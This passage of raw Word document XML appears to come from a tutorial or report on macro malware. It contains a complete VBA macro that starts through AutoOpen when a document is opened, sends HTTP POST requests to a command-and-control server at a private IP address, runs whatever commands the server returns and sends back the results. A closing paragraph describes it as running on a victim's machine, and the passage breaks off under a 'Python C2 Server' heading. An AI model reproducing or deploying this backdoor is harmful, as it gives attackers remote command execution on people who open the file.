                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">' Create an HTTP request object  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C20FC4E"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Set objHTTP = CreateObject("</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD6B02">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>MSXML2.XMLHTTP</w:t>
            </w:r>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="587C1340" w14:textId="1B6F513C" w:rsidR="00A61341" w:rsidRPr="002C63AB" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C63AB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidR="00F318FB" w:rsidRPr="002C63AB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>' Variable to store server response</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AFB7311" w14:textId="188C2EFC" w:rsidR="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    Dim replyTXT As String</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54F33843" w14:textId="2D99A16D" w:rsidR="00F318FB" w:rsidRPr="002C63AB" w:rsidRDefault="00F318FB" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C63AB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="002C63AB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">' Variable to store the </w:t>
            </w:r>
            <w:r w:rsidR="002C63AB" w:rsidRPr="002C63AB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>data</w:t>
            </w:r>
            <w:r w:rsidRPr="002C63AB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> to be sent</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B7A0D79" w14:textId="307BCAE0" w:rsidR="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    Dim data As String</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1822AFEB" w14:textId="57ADDEFC" w:rsidR="00F318FB" w:rsidRPr="002C63AB" w:rsidRDefault="00F318FB" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C63AB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="002C63AB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>' Variable to store the C2 server URL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64639A92" w14:textId="44504110" w:rsidR="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    Dim URL As String</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55DCE2A5" w14:textId="148BD9F5" w:rsidR="00F318FB" w:rsidRPr="00A61341" w:rsidRDefault="00F318FB" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C63AB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r w:rsidRPr="002C63AB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">' Initial data sent to the C2 server  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C2DB50B" w14:textId="76323239" w:rsidR="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    data = "START"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EBDA1B9" w14:textId="44A1268B" w:rsidR="002C63AB" w:rsidRPr="002C63AB" w:rsidRDefault="002C63AB" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C63AB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="002C63AB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>' C2 server URL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60875750"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URL = "http://192.168.1.131:8080/"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="432D7C9E"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43128A19" w14:textId="75508D44" w:rsidR="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    On Error GoTo err_handler</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E4863B0" w14:textId="77777777" w:rsidR="002C63AB" w:rsidRPr="00A61341" w:rsidRDefault="002C63AB" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3948AC9C" w14:textId="2A2525B0" w:rsidR="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    Do</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E23A71A" w14:textId="4C4058DB" w:rsidR="002C63AB" w:rsidRPr="002C63AB" w:rsidRDefault="002C63AB" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C63AB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="002C63AB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">' Open an HTTP POST request  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3412BA1C" w14:textId="5B9D9A41" w:rsidR="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">        objHTTP.Open "POST", URL, False</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4833A181" w14:textId="031D044F" w:rsidR="002C63AB" w:rsidRPr="002C63AB" w:rsidRDefault="002C63AB" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C63AB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="002C63AB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">' Set User-Agent header  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D7A8B0E" w14:textId="0B3B0F30" w:rsidR="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">        objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73C258A9" w14:textId="26D8044C" w:rsidR="002C63AB" w:rsidRPr="002C63AB" w:rsidRDefault="002C63AB" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="002C63AB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>' Set Content-Type header</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71356B7A" w14:textId="79D29C2D" w:rsidR="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">        objHTTP.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FBE60D0" w14:textId="66426C45" w:rsidR="002C63AB" w:rsidRPr="002C63AB" w:rsidRDefault="002C63AB" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C63AB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="002C63AB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r w:rsidRPr="002C63AB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="002C63AB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Send data to the C2 server  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29692DE5"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objHTTP.send "data=" &amp; data</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4312665C" w14:textId="10323F59" w:rsidR="00A61341" w:rsidRPr="002C63AB" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidR="002C63AB" w:rsidRPr="002C63AB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">' Receive response from the C2 server  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33EDABCB"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replyTXT = objHTTP.responseText</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FE45274" w14:textId="5A1BB46D" w:rsidR="00A61341" w:rsidRPr="002C63AB" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidR="002C63AB" w:rsidRPr="002C63AB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">' If response is "STOP", exit loop  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59C42B1B" w14:textId="2C12EE6A" w:rsidR="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">        If replyTXT = "STOP" Then Exit Do</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D511B6B" w14:textId="3D794980" w:rsidR="002C63AB" w:rsidRPr="00A61341" w:rsidRDefault="002C63AB" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="002C63AB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">' Execute received command and send output back  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55B69176"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data = RunCommand(replyTXT)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57F72FDC" w14:textId="41E7FE85" w:rsidR="00A61341" w:rsidRPr="002C63AB" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidR="002C63AB" w:rsidRPr="002C63AB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>' Repeat until server sends "STOP"</w:t>
            </w:r>
            <w:r w:rsidRPr="002C63AB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40F3FC83"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Loop While replyTXT &lt;&gt; "STOP"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B2B1583" w14:textId="3467BAB8" w:rsidR="00A61341" w:rsidRPr="002C63AB" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidR="002C63AB" w:rsidRPr="002C63AB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>' Display message when the session ends</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BE15BD5" w14:textId="76CCC653"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MsgBox "</w:t>
            </w:r>
            <w:r w:rsidR="002C63AB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>C2 session ended</w:t>
            </w:r>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F8CF6AF" w14:textId="77777777" w:rsidR="00A61341" w:rsidRPr="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">    End</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DE07E9A"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Exit Function</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4865AA6B"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err_handler:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F47A7DB" w14:textId="194323E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MsgBox </w:t>
            </w:r>
            <w:r w:rsidR="002C63AB" w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidR="002C63AB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Session terminated</w:t>
            </w:r>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AFF665B"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End</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33069D2E" w14:textId="5BA50366" w:rsidR="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>End Function</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64803938" w14:textId="77777777" w:rsidR="002C63AB" w:rsidRPr="00A61341" w:rsidRDefault="002C63AB" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1FC8CBC0" w14:textId="4D915635" w:rsidR="00A61341" w:rsidRPr="002C63AB" w:rsidRDefault="002C63AB" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C63AB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>' Automatically execute the C2 function when the document is opened</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="753D36A6"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Sub AutoOpen()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48667D75"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StartC2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EE7D4C9"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End Sub</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BE8C1C9" w14:textId="77777777" w:rsidR="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:pStyle w:val="Pharagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49556926" w14:textId="2889A47D" w:rsidR="00F318FB" w:rsidRDefault="008B5287" w:rsidP="00A61341">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F318FB">
        <w:t>The VBA script runs on the victim's machine when they open a malicious document. It communicates with the C2 server, executes commands received, and sends back the results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB3B4A2" w14:textId="28256586" w:rsidR="00F318FB" w:rsidRDefault="00F318FB" w:rsidP="00A61341">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DB481C6" w14:textId="1D86754B" w:rsidR="00F318FB" w:rsidRDefault="008B5287" w:rsidP="00A61341">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B5287">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Python C2 Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4E9025" w14:textId="4EDEA3DB" w:rsidR="008B5287" w:rsidRDefault="008B5287" w:rsidP="00A61341">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
